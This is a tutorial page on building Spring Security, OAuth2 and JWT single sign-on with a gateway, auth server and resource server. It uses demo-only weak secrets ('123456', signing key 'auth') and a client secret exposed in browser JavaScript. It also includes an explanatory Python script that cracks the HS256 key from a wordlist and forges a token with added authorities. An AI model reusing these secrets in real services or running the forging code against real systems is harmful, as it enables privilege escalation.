Shulou (Shulou.com) 06/03 Report, updated 2025-04-04. From: SLTechnology News&Howtos > Development
This article introduces how to build a single sign-on (SSO) system with Java Spring: Spring Security for authentication, OAuth2 for the authorization protocol and JWT as the token format. Many people run into exactly these problems in real projects, so the editor walks through the setup step by step; read it carefully and you should be able to reproduce it.
Catalogue
1. Introduction to single sign-on systems
2. Simple service implementation
2.1 Add dependencies
2.2 Project profile
2.3 Add a project startup class
2.4 Start and access the project
3. Further design
3.1 Define the security configuration class SecurityConfig
3.2 Define the user information processing object
3.3 Login routing configuration in the gateway
3.4 Access testing based on Postman
3.5 Define the login page
3.6 Build the token configuration object
3.7 Define the authentication and authorization core configuration
3.8 Core configuration of the authorization server
3.9 Postman access test
4. Resource server configuration (sca-resource)
4.1 Build the token configuration object
4.2 Resource service token resolution configuration
4.3 Set permissions for resource access
4.4 Start the service and test access
4.4.1 Obtain a token from the auth authentication and authorization service
4.4.2 Access the resource server with the token
4.4.3 Show the 403 exception on the front page
4.5 OAuth2 specification
4.6 Interview question points
5. Bug analysis
1. Introduction to single sign-on systems
In a multi-point login system every service authenticates users itself. That is cumbersome to use (each visit to a resource service requires a fresh login, authentication and authorization) and the same security code is duplicated in every service. This is why single sign-on systems are so popular.
In a single sign-on system several sites share one authentication and authorization server. After logging in at any one of these sites, the user can access all the other sites without logging in again, and the sites can share the login state directly.
2. Simple service implementation
Add an authentication and authorization service to the file-upload project. A login page (login.html) collects the login account and password and submits them to the gateway, which forwards the request to the auth project. Both successful and failed logins must return JSON data. The implementation is as follows.
Create the sca-auth sub-module in the 02-sca project as the authentication and authorization service.
2.1 Add dependencies
Add the following dependencies to the pom.xml of sca-auth (the Spring Security OAuth2 starter supplies the authorization server, token store and JWT converter used below):

    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>com.alibaba.cloud</groupId>
            <artifactId>spring-cloud-starter-alibaba-nacos-discovery</artifactId>
        </dependency>
        <dependency>
            <groupId>com.alibaba.cloud</groupId>
            <artifactId>spring-cloud-starter-alibaba-nacos-config</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.cloud</groupId>
            <artifactId>spring-cloud-starter-oauth2</artifactId>
        </dependency>
        <dependency>
            <groupId>org.projectlombok</groupId>
            <artifactId>lombok</artifactId>
        </dependency>
    </dependencies>

2.2 Project profile
Create a bootstrap.yml file in the sca-auth project:

    server:
      port: 8071
    spring:
      application:
        name: sca-auth
      cloud:
        nacos:
          discovery:
            server-addr: localhost:8848
          config:
            server-addr: localhost:8848

2.3 Add a project startup class

    package com.jt;

    import org.springframework.boot.SpringApplication;
    import org.springframework.boot.autoconfigure.SpringBootApplication;

    @SpringBootApplication
    public class ResourceAuthApplication {
        public static void main(String[] args) {
            SpringApplication.run(ResourceAuthApplication.class, args);
        }
    }

2.4 Start and access the project
When the project starts, Spring Security generates a random login password and prints it on the console.
Open http://localhost:8071 in a browser to render the default login page.
The default user name is user, and the password is the one printed on the console at startup. Run the login test; after a successful login the following page appears (a 404, because no post-login page has been defined yet).
3. Further design
3.1 Define the security configuration class SecurityConfig
Modify the SecurityConfig configuration class to add the processing logic for successful and failed logins:

    package com.jt.auth.config;

    import com.fasterxml.jackson.databind.ObjectMapper;
    import org.springframework.context.annotation.Bean;
    import org.springframework.context.annotation.Configuration;
    import org.springframework.security.authentication.AuthenticationManager;
    import org.springframework.security.config.annotation.web.builders.HttpSecurity;
    import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
    import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;
    import org.springframework.security.web.authentication.AuthenticationFailureHandler;
    import org.springframework.security.web.authentication.AuthenticationSuccessHandler;

    import javax.servlet.http.HttpServletResponse;
    import java.io.IOException;
    import java.io.PrintWriter;
    import java.util.HashMap;
    import java.util.Map;

    /**
     * Security configuration. At startup Spring creates a proxy of this class and
     * uses it to initialise the security filter chain.
     * WebSecurityConfigurerAdapter is an adapter: we extend it and override only
     * the parts we need.
     */
    @Configuration
    public class SecurityConfig extends WebSecurityConfigurerAdapter {

        /**
         * Password hashing object. BCrypt is a slow, salted hash. Plain MD5 is fast
         * and unsalted, so MD5 digests can be brute-forced or looked up in
         * precomputed (rainbow) tables.
         */
        @Bean
        public BCryptPasswordEncoder passwordEncoder() {
            return new BCryptPasswordEncoder();
        }

        /**
         * Expose the authentication manager (it verifies the credentials the user
         * submits) as a bean; the authorization server configuration uses it.
         */
        @Bean
        @Override
        public AuthenticationManager authenticationManagerBean() throws Exception {
            return super.authenticationManagerBean();
        }

        /**
         * Login rules:
         * 1) permit every request (this project only does authentication)
         * 2) return JSON on login success
         * 3) return JSON on login failure
         */
        @Override
        protected void configure(HttpSecurity http) throws Exception {
            // Disable CSRF protection. This is not "cross-domain": CSRF tokens guard
            // cookie-authenticated form posts, and they are switched off here because
            // the callers are JavaScript and Postman, not server-rendered forms.
            http.csrf().disable();
            // Permit all requests; authorization is enforced on the resource server.
            http.authorizeRequests().anyRequest().permitAll();
            // Form login with JSON success and failure responses.
            http.formLogin()
                .successHandler(successHandler())
                .failureHandler(failureHandler());
        }

        @Bean // AuthenticationSuccessHandler is a functional interface, so a lambda will do
        public AuthenticationSuccessHandler successHandler() {
            return (request, response, authentication) -> {
                // 1. Build the response data
                Map<String, Object> map = new HashMap<>();
                map.put("state", 200);
                map.put("message", "login ok");
                // 2. Write it to the client as JSON
                writeJsonToClient(response, map);
            };
        }

        @Bean // AuthenticationFailureHandler as a lambda
        public AuthenticationFailureHandler failureHandler() {
            return (request, response, e) -> {
                Map<String, Object> map = new HashMap<>();
                map.put("state", 500);
                // Keep the message generic: do not reveal whether the user name or
                // the password was wrong.
                map.put("message", "login failure");
                writeJsonToClient(response, map);
            };
        }

        /** Shared helper: serialise any object (not only a Map) to JSON and write it to the client. */
        private void writeJsonToClient(HttpServletResponse response, Object object) throws IOException {
            // Alternatives: Gson (toJson, separate dependency) or fastjson (JSON.toJSONString,
            // pulled in by spring-cloud-starter-alibaba-sentinel). Jackson ships with
            // spring-boot-starter-web, so it is used here.
            String jsonStr = new ObjectMapper().writeValueAsString(object);
            response.setContentType("application/json;charset=utf-8");
            PrintWriter writer = response.getWriter();
            writer.println(jsonStr);
            writer.flush();
        }
    }

3.2 Define the user information processing object
Normally this object compares the submitted credentials with the user record in the database to decide whether authentication succeeds and which permissions are granted.

    package com.jt.auth.service;

    import org.springframework.beans.factory.annotation.Autowired;
    import org.springframework.security.core.GrantedAuthority;
    import org.springframework.security.core.authority.AuthorityUtils;
    import org.springframework.security.core.userdetails.User;
    import org.springframework.security.core.userdetails.UserDetails;
    import org.springframework.security.core.userdetails.UserDetailsService;
    import org.springframework.security.core.userdetails.UsernameNotFoundException;
    import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;
    import org.springframework.stereotype.Service;

    import java.util.List;

    /**
     * Loads and packages the user information at login time.
     * When the login button is clicked, Spring Security calls loadUserByUsername
     * with the user name entered on the page.
     */
    @Service
    public class UserDetailsServiceImpl implements UserDetailsService {

        @Autowired
        private BCryptPasswordEncoder passwordEncoder;

        /**
         * Look the user up (normally in the database) and grant the matching
         * authorities. UserDetails carries both the credentials and the permissions.
         */
        @Override
        public UserDetails loadUserByUsername(String username) throws UsernameNotFoundException {
            // 1. Query the user by user name (name, status, password, ...)
            //    Userinfo userinfo = userMapper.selectUserByUsername(username);
            //    The database lookup is abbreviated: every user name is accepted with the
            //    fixed password "123456". Demo only. A real service loads the stored BCrypt
            //    hash and throws UsernameNotFoundException for unknown users.
            String encodedPassword = passwordEncoder.encode("123456");
            // 2. Query the user's permissions (from the database later); fake data for now
            List<GrantedAuthority> authorities =
                    AuthorityUtils.createAuthorityList("sys:res:create", "sys:res:retrieve");
            // 3. Package the user information. Spring Security compares the submitted
            //    password against encodedPassword with the BCryptPasswordEncoder bean.
            return new User(username, encodedPassword, authorities);
        }
    }

3.3 Login routing configuration in the gateway
Add the following configuration to the gateway profile:

    server:
      port: 9001
    spring:
      application:
        name: sca-resource-gateway
      cloud:
        sentinel: # rate limiting
          transport:
            dashboard: localhost:8180
          eager: true
        nacos:
          discovery:
            server-addr: localhost:8848
          config:
            server-addr: localhost:8848
            file-extension: yml
        gateway:
          discovery:
            locator:
              enabled: true
          routes:
            - id: router02
              uri: lb://sca-auth        # lb = load balanced; ribbon is the default client
              predicates:               # request rules this route accepts
                - Path=/auth/login/**
              filters:
                - StripPrefix=1         # drop the first path segment (/auth) before forwarding

Note that Path=/auth/login/** covers only the form-login URL. The token endpoint used from section 3.5 onwards (http://localhost:9001/auth/oauth/token) is not matched by it; widen the predicate (for example Path=/auth/**) if the gateway is to forward that request as well.
3.4 Access testing based on Postman
Start the sca-gateway and sca-auth services, then test the login through the gateway with Postman (POST http://localhost:9001/auth/login with username and password form fields; the gateway strips /auth and forwards to Spring Security's /login).
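To see which requests the route above actually forwards, here is an added example (not code from the original article) that simulates the gateway's Path predicate and StripPrefix filter in Python. The route table is copied from the profile above; the Path-pattern semantics implemented here (a trailing /** matching the segment and everything below it, a single * matching one segment) are an assumption that covers the patterns this page uses, not the full Spring Cloud Gateway matcher.

```python
import re
from typing import Callable, Optional, Tuple

# Route table copied from the gateway profile on this page (id router02).
PAGE_ROUTES = [
    {
        "id": "router02",
        "uri": "lb://sca-auth",
        "predicates": ["Path=/auth/login/**"],
        "filters": ["StripPrefix=1"],
    },
]


def path_predicate(pattern: str) -> Callable[[str], bool]:
    """Compile a gateway Path pattern into a matcher.

    A trailing '/**' matches the segment itself plus anything below it;
    a single '*' matches within one segment.
    """
    if pattern.endswith("/**"):
        base = re.escape(pattern[:-3]).replace(r"\*", "[^/]*")
        regex = re.compile(f"^{base}(/.*)?$")
    else:
        body = re.escape(pattern).replace(r"\*\*", ".*").replace(r"\*", "[^/]*")
        regex = re.compile(f"^{body}$")
    return lambda path: regex.match(path) is not None


def strip_prefix(path: str, parts: int) -> str:
    """StripPrefix=n: drop the first n path segments before forwarding."""
    segments = [s for s in path.split("/") if s]
    return "/" + "/".join(segments[parts:])


def route(path: str, routes=PAGE_ROUTES) -> Optional[Tuple[str, str]]:
    """Return (target uri, forwarded path) for the first matching route, or None."""
    for r in routes:
        patterns = [p.split("=", 1)[1] for p in r["predicates"] if p.startswith("Path=")]
        if not any(path_predicate(p)(path) for p in patterns):
            continue
        forwarded = path
        for f in r["filters"]:
            if f.startswith("StripPrefix="):
                forwarded = strip_prefix(forwarded, int(f.split("=", 1)[1]))
        return r["uri"], forwarded
    return None  # no route matched: the gateway answers 404 itself


if __name__ == "__main__":
    for p in ["/auth/login", "/auth/login/jack", "/auth/oauth/token"]:
        print(p, "->", route(p))
    # A widened predicate that also covers the token endpoint used in section 3.5.
    wide = [dict(PAGE_ROUTES[0], predicates=["Path=/auth/**"])]
    print("/auth/oauth/token with Path=/auth/** ->", route("/auth/oauth/token", wide))
```

With the page's predicate, /auth/login is forwarded to sca-auth as /login, while /auth/oauth/token gets no route at all; the widened Path=/auth/** forwards it as /oauth/token, which is what the login page and the Postman tests later in this article rely on.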
3.5 Define the login page
Define the login-sso.html login page in the static directory of the sca-resource-ui project:

    <!DOCTYPE html>
    <html>
    <head>
        <meta charset="utf-8">
        <title>Login</title>
    </head>
    <body>
    <div id="app">
        <h2>Please Login</h2>
        <form @submit.prevent="doLogin">
            <label>Username <input type="text" v-model="username"></label>
            <label>Password <input type="password" v-model="password"></label>
            <button type="submit">Submit</button>
        </form>
    </div>
    <!-- vue.js and axios.js must be included on the page; these paths are assumed -->
    <script src="/js/vue.js"></script>
    <script src="/js/axios.min.js"></script>
    <script>
        var vm = new Vue({
            el: "#app",   // mount point; Vue builds its in-memory DOM tree from here
            data: {       // data bound to the page
                username: "",
                password: ""
            },
            methods: {    // event handlers
                doLogin() {
                    // 1. token endpoint, reached through the gateway
                    let url = "http://localhost:9001/auth/oauth/token";
                    // 2. password-grant parameters
                    let params = new URLSearchParams();
                    params.append("username", this.username);
                    params.append("password", this.password);
                    params.append("client_id", "gateway-client");
                    params.append("grant_type", "password");
                    params.append("client_secret", "123456");
                    // 3. send the request; keep the access token for later resource calls
                    axios.post(url, params).then((response) => {
                        console.log(response.data);
                        let result = response.data;
                        localStorage.setItem("accessToken", result.access_token);
                        location.href = "/fileupload.html";
                    });
                }
            }
        });
    </script>
    </body>
    </html>

Because the client_secret sits in browser JavaScript it is visible to every user, so gateway-client is effectively a public client, and with the password grant the user's raw password passes through the client application. That is acceptable for a first-party page in a lab setup; for third-party clients use the authorization code grant instead.
3.6 Build the token configuration object
With JSON Web Token (JWT, a JSON-based token format) the user information is serialised as JSON, signed with the server's key and returned to the client, which stores it and sends it along with every later request. The resource server verifies the signature and reads the user information out of the token itself, so no session state has to be kept in server memory. Note that a JWT is signed, not encrypted: the payload is only base64url-encoded and can be read by anyone who holds the token, so put nothing secret in it.
Create the TokenConfig class under the config directory:

    package com.jt.auth.config;

    import org.springframework.context.annotation.Bean;
    import org.springframework.context.annotation.Configuration;
    import org.springframework.security.oauth2.provider.token.TokenStore;
    import org.springframework.security.oauth2.provider.token.store.JwtAccessTokenConverter;
    import org.springframework.security.oauth2.provider.token.store.JwtTokenStore;

    /**
     * Creates JWT tokens. A JWT has three parts:
     *   header    (token type and signing algorithm)
     *   payload   (user information, authorities, expiry)
     *   signature (HMAC over header and payload; HS256 here)
     */
    @Configuration
    public class TokenConfig {

        /**
         * Key used to sign tokens on issue and to verify them on the resource server.
         * "auth" is a placeholder: an HS256 key this short is guessable offline, so use
         * a long random secret (or an RSA key pair) outside a classroom setup.
         */
        private String SIGNING_KEY = "auth";

        @Bean // token store backed by the JWT converter; nothing is stored server-side
        public TokenStore tokenStore() {
            return new JwtTokenStore(jwtAccessTokenConverter());
        }

        @Bean // converts access tokens to JWT strings and back
        public JwtAccessTokenConverter jwtAccessTokenConverter() {
            JwtAccessTokenConverter converter = new JwtAccessTokenConverter();
            converter.setSigningKey(SIGNING_KEY); // signing and verification key
            return converter;
        }
    }
Create an authentication manager object
The SecurityConfig class from section 3.1 already exposes the authentication manager as a bean; if yours does not, add the following method to SecurityConfig (the authorization server configuration uses it):

    /**
     * Expose the authentication manager (it verifies the credentials the user
     * submits) as a bean for use in other configuration classes.
     */
    @Bean
    @Override
    public AuthenticationManager authenticationManagerBean() throws Exception {
        return super.authenticationManagerBean();
    }

3.7 Define the authentication and authorization core configuration
3.8 Core configuration of the authorization server

    package com.jt.auth.config;

    import lombok.AllArgsConstructor;
    import org.springframework.context.annotation.Bean;
    import org.springframework.context.annotation.Configuration;
    import org.springframework.http.HttpMethod;
    import org.springframework.security.authentication.AuthenticationManager;
    import org.springframework.security.core.userdetails.UserDetailsService;
    import org.springframework.security.crypto.password.PasswordEncoder;
    import org.springframework.security.oauth2.config.annotation.configurers.ClientDetailsServiceConfigurer;
    import org.springframework.security.oauth2.config.annotation.web.configuration.AuthorizationServerConfigurerAdapter;
    import org.springframework.security.oauth2.config.annotation.web.configuration.EnableAuthorizationServer;
    import org.springframework.security.oauth2.config.annotation.web.configurers.AuthorizationServerEndpointsConfigurer;
    import org.springframework.security.oauth2.config.annotation.web.configurers.AuthorizationServerSecurityConfigurer;
    import org.springframework.security.oauth2.provider.token.AuthorizationServerTokenServices;
    import org.springframework.security.oauth2.provider.token.DefaultTokenServices;
    import org.springframework.security.oauth2.provider.token.TokenEnhancerChain;
    import org.springframework.security.oauth2.provider.token.TokenStore;
    import org.springframework.security.oauth2.provider.token.store.JwtAccessTokenConverter;

    import java.util.Arrays;

    /**
     * Assembles authentication, authorization and JWT issuance:
     *   1) Spring Security (authentication and authorization)
     *   2) TokenConfig (JWT token store and converter)
     *   3) OAuth2 endpoints and client registration
     */
    @AllArgsConstructor          // Lombok: constructor injection of the fields below
    @Configuration
    @EnableAuthorizationServer   // enable the OAuth2 authorization server endpoints
    public class Oauth2Config extends AuthorizationServerConfigurerAdapter {

        // authenticates the user's credentials
        private AuthenticationManager authenticationManager;
        // creates tokens and reads information back out of them
        private TokenStore tokenStore;
        // builds JWT strings from token data and parses them again
        private JwtAccessTokenConverter jwtAccessTokenConverter;
        // hashes and matches passwords (also used for the client secret)
        private PasswordEncoder passwordEncoder;
        // loads user details (user name, password, authorities)
        private UserDetailsService userDetailsService;

        /** Token endpoint (/oauth/token) configuration: this is where clients obtain JWTs. */
        @Override
        public void configure(AuthorizationServerEndpointsConfigurer endpoints) throws Exception {
            endpoints
                // authentication manager used to check the submitted credentials
                .authenticationManager(authenticationManager)
                // how user details are looked up during authentication
                .userDetailsService(userDetailsService)
                // HTTP methods the token endpoint accepts. GET is allowed here for
                // convenience; restricting to POST keeps credentials out of URLs and logs.
                .allowedTokenEndpointRequestMethods(HttpMethod.POST, HttpMethod.GET)
                // token generation; without this the token is UUID.randomUUID().toString()
                .tokenServices(tokenService());
        }

        /** Token generation policy. */
        @Bean
        public AuthorizationServerTokenServices tokenService() {
            DefaultTokenServices services = new DefaultTokenServices();
            // issue refresh tokens (access tokens expire)
            services.setSupportRefreshToken(true);
            // token format comes from TokenConfig (JWT)
            services.setTokenStore(tokenStore);
            // token enhancer: lets extra data (e.g. authorities) be added to the payload
            TokenEnhancerChain chain = new TokenEnhancerChain();
            chain.setTokenEnhancers(Arrays.asList(jwtAccessTokenConverter));
            services.setTokenEnhancer(chain);
            // access token lifetime: 1 hour
            services.setAccessTokenValiditySeconds(3600);
            // refresh token lifetime: 3 days. A refresh token lets the client obtain a new
            // access token shortly before the old one expires without asking for credentials again.
            services.setRefreshTokenValiditySeconds(3600 * 72);
            // services.setClientDetailsService(clientDetailsService);
            return services;
        }

        /** Client registration: like user details, but for the calling application. */
        @Override
        public void configure(ClientDetailsServiceConfigurer clients) throws Exception {
            clients.inMemory()
                // client id
                .withClient("gateway-client")
                // client secret, stored hashed
                .secret(passwordEncoder.encode("123456"))
                // scopes: "all" is only a name, any string would have the same effect
                .scopes("all")
                // grant types this client may use; the spelling must match the spec exactly
                .authorizedGrantTypes("password", "refresh_token");
        }

        /** Security constraints on the authorization server's own endpoints. */
        @Override
        public void configure(AuthorizationServerSecurityConfigurer security) throws Exception {
            security
                // expose /oauth/token_key (the verification key; meaningful with RSA signing)
                .tokenKeyAccess("permitAll()")
                // expose /oauth/check_token so resource servers can introspect tokens
                .checkTokenAccess("permitAll()")
                // allow clients to send client_id/client_secret as form parameters
                .allowFormAuthenticationForClients();
        }
    }

3.9 Postman access test
Step 1: start the services
Start the sca-auth service, then the sca-resource-gateway and sca-resource-ui services.
Step 2: check the Endpoints information printed on the sca-auth console at startup (the OAuth2 endpoints such as /oauth/token are mapped there).
Step 3: open Postman and test the login: POST http://localhost:9001/auth/oauth/token with the form fields username, password, client_id=gateway-client, client_secret=123456 and grant_type=password. A successful response looks like this (truncated on the page):

    {
      "access_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2MzAwNzYxMTAsInVzZXJfbmFtZSI6ImphY2siLCJhdXRob3JpdGllcyI6WyJzeXM6cmVzOmNyZWF0ZSIsInN5czpyZXM6cmV0cmlldmUiXSwianRpIjoiM2Q0MzExOTYtYmRkZi00Y2NhLWFmMDMtNWMzNGM4ZmJkNzQ3IiwiY2xpZW50X2lkIjoiZ2F0ZXdheS1jbGllbnQiLCJzY29wZSI6WyJhbGwiXX0.GnrlqsZMSdagDaRQDZWDLbY7I7KUlXQgyXATcXXS6FI",
      "token_type": "bearer",

4. Resource server configuration (sca-resource)
4.1 Build the token configuration object
The resource server needs the same TokenConfig as the auth service (same SIGNING_KEY, otherwise the signatures on incoming tokens cannot be verified):

    package com.jt.resource.config;

    import org.springframework.context.annotation.Bean;
    import org.springframework.context.annotation.Configuration;
    import org.springframework.security.oauth2.provider.token.TokenStore;
    import org.springframework.security.oauth2.provider.token.store.JwtAccessTokenConverter;
    import org.springframework.security.oauth2.provider.token.store.JwtTokenStore;

    /**
     * JWT handling on the resource side. A JWT has three parts:
     *   header    (token type and signing algorithm)
     *   payload   (user information, authorities, expiry)
     *   signature (HMAC over header and payload)
     */
    @Configuration
    public class TokenConfig {

        // Must equal the key the auth service signs with; it is used here to verify tokens.
        private String SIGNING_KEY = "auth";

        @Bean // token store backed by the JWT converter; it parses tokens, it does not issue them
        public TokenStore tokenStore() {
            return new JwtTokenStore(jwtAccessTokenConverter());
        }

        @Bean // JWT converter
        public JwtAccessTokenConverter jwtAccessTokenConverter() {
            JwtAccessTokenConverter converter = new JwtAccessTokenConverter();
            converter.setSigningKey(SIGNING_KEY); // verification key
            return converter;
        }
    }
4.2 Resource service token resolution configuration

    package com.jt.resource.config;

    import com.fasterxml.jackson.databind.ObjectMapper;
    import org.springframework.beans.factory.annotation.Autowired;
    import org.springframework.context.annotation.Bean;
    import org.springframework.context.annotation.Configuration;
    import org.springframework.security.config.annotation.method.configuration.EnableGlobalMethodSecurity;
    import org.springframework.security.config.annotation.web.builders.HttpSecurity;
    import org.springframework.security.oauth2.config.annotation.web.configuration.EnableResourceServer;
    import org.springframework.security.oauth2.config.annotation.web.configuration.ResourceServerConfigurerAdapter;
    import org.springframework.security.oauth2.config.annotation.web.configurers.ResourceServerSecurityConfigurer;
    import org.springframework.security.oauth2.provider.token.TokenStore;
    import org.springframework.security.web.access.AccessDeniedHandler;

    import javax.servlet.http.HttpServletResponse;
    import java.io.PrintWriter;
    import java.util.HashMap;
    import java.util.Map;

    /**
     * Resource server configuration:
     *   1) JWT resolution (the token a client presents is verified and decoded here)
     *   2) authorization for resource access (not every logged-in user may access everything)
     */
    @Configuration
    @EnableResourceServer                               // default resource server setup
    @EnableGlobalMethodSecurity(prePostEnabled = true)  // check @PreAuthorize before a method runs
    public class ResourceServerConfig extends ResourceServerConfigurerAdapter {

        @Autowired
        private TokenStore tokenStore;

        /** Token service configuration: this store parses tokens, it does not create them. */
        @Override
        public void configure(ResourceServerSecurityConfigurer resources) throws Exception {
            resources.tokenStore(tokenStore);
        }

        /** Route security configuration. */
        @Override
        public void configure(HttpSecurity http) throws Exception {
            // CSRF protection off: bearer-token API without a cookie session
            http.csrf().disable();
            // Permit all URLs; access control is done per method with @PreAuthorize.
            // The commented alternative would demand a valid token for /resource/**
            // and answer 401 when none is presented.
            http.authorizeRequests().anyRequest().permitAll();
            // http.authorizeRequests().mvcMatchers("/resource/**").authenticated();
            // 403 handling: the response returned when access is denied
            http.exceptionHandling().accessDeniedHandler(accessDeniedHandler());
        }

        @Bean
        public AccessDeniedHandler accessDeniedHandler() {
            return (request, response, exception) -> {
                Map<String, Object> map = new HashMap<>();
                map.put("state", HttpServletResponse.SC_FORBIDDEN); // 403
                map.put("message", "Sorry, no such resource");
                // 1. response encoding and content type
                response.setCharacterEncoding("utf-8");
                response.setContentType("application/json;charset=utf-8");
                // 2. serialise to JSON. Jackson comes with spring-boot-starter-web;
                //    fastjson (JSON.toJSONString, via spring-cloud-starter-alibaba-sentinel)
                //    or Gson (new Gson().toJson, separate dependency) work as well.
                String jsonStr = new ObjectMapper().writeValueAsString(map);
                PrintWriter writer = response.getWriter();
                writer.println(jsonStr);
                writer.flush();
            };
        }
    }

With anyRequest().permitAll() a request without a token still reaches the controller; the AccessDeniedException raised by @PreAuthorize for an anonymous caller is turned into a 401 by the authentication entry point, while a valid token that lacks the required authority goes to the AccessDeniedHandler above and gets the 403 JSON.
4.3 Set permissions for resource access
Add the @PreAuthorize("hasAuthority('sys:res:create')") annotation to the upload method of ResourceController. It tells the framework which authority the caller's token must carry before the method is allowed to run:

    @PreAuthorize("hasAuthority('sys:res:create')")
    @PostMapping("/upload/")
    public String uploadFile(MultipartFile uploadFile) throws IOException {
        ...
    }

Without that authority the call fails with a 403, and the JSON message configured for the 403 exception above is returned to the client.
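The following is an added example in Python (not code from the article or from the sca project) that makes the token mechanics of sections 3.6, 3.9 and 4.2/4.3 concrete offline: it decodes the claims of the sample access_token shown in the Postman test without any key, mints and verifies HS256 tokens the way JwtAccessTokenConverter.setSigningKey does, reproduces the 401/403/200 decisions the resource server makes for a @PreAuthorize("hasAuthority(...)") method, and shows why SIGNING_KEY = "auth" is dangerous: a short key is recovered from a wordlist and then used to forge a token with an extra authority. The wordlist, the minted claims and the status-code mapping are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Iterable, Optional

# Sample access_token copied from the Postman test in section 3.9 of this page.
PAGE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJleHAiOjE2MzAwNzYxMTAsInVzZXJfbmFtZSI6ImphY2siLCJhdXRob3JpdGllcyI6WyJzeXM6cmVzOmNyZWF0ZSIsInN5czpyZXM6cmV0cmlldmUiXSwianRpIjoiM2Q0MzExOTYtYmRkZi00Y2NhLWFmMDMtNWMzNGM4ZmJkNzQ3IiwiY2xpZW50X2lkIjoiZ2F0ZXdheS1jbGllbnQiLCJzY29wZSI6WyJhbGwiXX0."
    "GnrlqsZMSdagDaRQDZWDLbY7I7KUlXQgyXATcXXS6FI"
)


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _compact(obj) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode("utf-8")


def mint_hs256(claims: dict, key: str) -> str:
    """Issue a token as JwtAccessTokenConverter.setSigningKey(key) does:
    HMAC-SHA256 over base64url(header).base64url(payload)."""
    header = b64url_encode(_compact({"alg": "HS256", "typ": "JWT"}))
    payload = b64url_encode(_compact(claims))
    sig = hmac.new(key.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


def decode_claims(token: str) -> dict:
    """Read the payload WITHOUT checking the signature: a JWT is signed, not
    encrypted, so anyone holding the token can read its claims."""
    return json.loads(b64url_decode(token.split(".")[1]))


def verify_hs256(token: str, key: str, now: Optional[float] = None) -> Optional[dict]:
    """Return the claims if signature and expiry are valid, otherwise None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        if not isinstance(header, dict) or header.get("alg") != "HS256":
            return None  # reject alg "none" and algorithm swaps outright
        expected = hmac.new(key.encode(), f"{header_b64}.{payload_b64}".encode(),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return None
        claims = json.loads(b64url_decode(payload_b64))
    except ValueError:  # malformed base64 or JSON
        return None
    now = time.time() if now is None else now
    if "exp" in claims and claims["exp"] <= now:
        return None
    return claims


def authorize(auth_header: Optional[str], required_authority: str, key: str,
              now: Optional[float] = None) -> int:
    """Status the resource server answers with: 401 without a usable bearer token
    (missing, bad signature, expired), 403 when the token lacks the authority that
    @PreAuthorize("hasAuthority(...)") demands, 200 otherwise."""
    if not auth_header or not auth_header.startswith("Bearer "):
        return 401
    claims = verify_hs256(auth_header[len("Bearer "):], key, now)
    if claims is None:
        return 401
    if required_authority not in claims.get("authorities", []):
        return 403
    return 200


def crack_signing_key(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack on the HS256 key. now=0 so that an expired token
    is still accepted: only the signature matters for recovering the key."""
    for key in candidates:
        if verify_hs256(token, key, now=0) is not None:
            return key
    return None


def forge(token: str, key: str, extra_authority: str) -> str:
    """Re-issue a token with one more authority once the signing key is known."""
    claims = decode_claims(token)
    claims["authorities"] = list(claims.get("authorities", [])) + [extra_authority]
    return mint_hs256(claims, key)


if __name__ == "__main__":
    print("claims in the page's sample token:", decode_claims(PAGE_TOKEN))
    # constructed token, signed with the page's SIGNING_KEY "auth"
    token = mint_hs256({"user_name": "jack", "authorities": ["sys:res:retrieve"],
                        "exp": int(time.time()) + 3600}, "auth")
    print("upload with sys:res:retrieve only ->", authorize("Bearer " + token, "sys:res:create", "auth"))  # 403
    recovered = crack_signing_key(token, ["secret", "password", "jwt", "auth"])   # constructed wordlist
    print("signing key recovered from wordlist:", recovered)  # auth
    forged = forge(token, recovered, "sys:res:create")
    print("forged token ->", authorize("Bearer " + forged, "sys:res:create", "auth"))  # 200
```

The sample token decodes to user_name jack with the two authorities granted in UserDetailsServiceImpl, a one-hour exp, the client id gateway-client and scope all. The key recovery is the real lesson: HS256 is only as strong as the secret, so an attacker holding any token issued by this auth service can test candidate keys offline at HMAC speed, and once "auth" falls every resource server that shares it accepts forged authorities. A long random secret, or RSA signing with only the public key on the resource servers, closes that path.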
4.4 Start the service and test access
4.4.1 Obtain a token from the auth authentication and authorization service
Start the services (sca-auth, sca-resource-gateway, sca-resource).
In Postman, POST to the auth service through the gateway at http://localhost:9001/auth/oauth/token (form fields username, password, client_id=gateway-client, client_secret=123456, grant_type=password) to obtain the token.
4.4.2 Access the resource server with the token
Copy the access_token and send a request to http://localhost:9001/sca/resource/upload/
1. Set the request header to carry the token (Authorization: Bearer <access_token>) and let Postman set the multipart content type of the request.
2. Set the request body to form-data with a key of type File. The key name must match the parameter name of the upload method in your server controller (uploadFile), and its value is the file you select.
4.4.3 Show the 403 exception on the front page

    function upload(file) {
        // 1. build a multipart form and add the file under the controller's parameter name
        let form = new FormData();
        form.append("uploadFile", file);
        // gateway address (port 9001 in the gateway profile above)
        let url = "http://localhost:9001/sca/resource/upload/";
        // 2. submit asynchronously, sending the token saved at login in the Authorization header
        axios.post(url, form, {
            headers: {"Authorization": "Bearer " + localStorage.getItem("accessToken")}
        }).then(function (response) {
            let result = response.data;
            if (result.state == 403) {
                alert(result.message);
                return;
            }
            alert("upload ok");
        });
    }
1. Start the services (sca-auth, sca-resource-gateway, sca-resource).
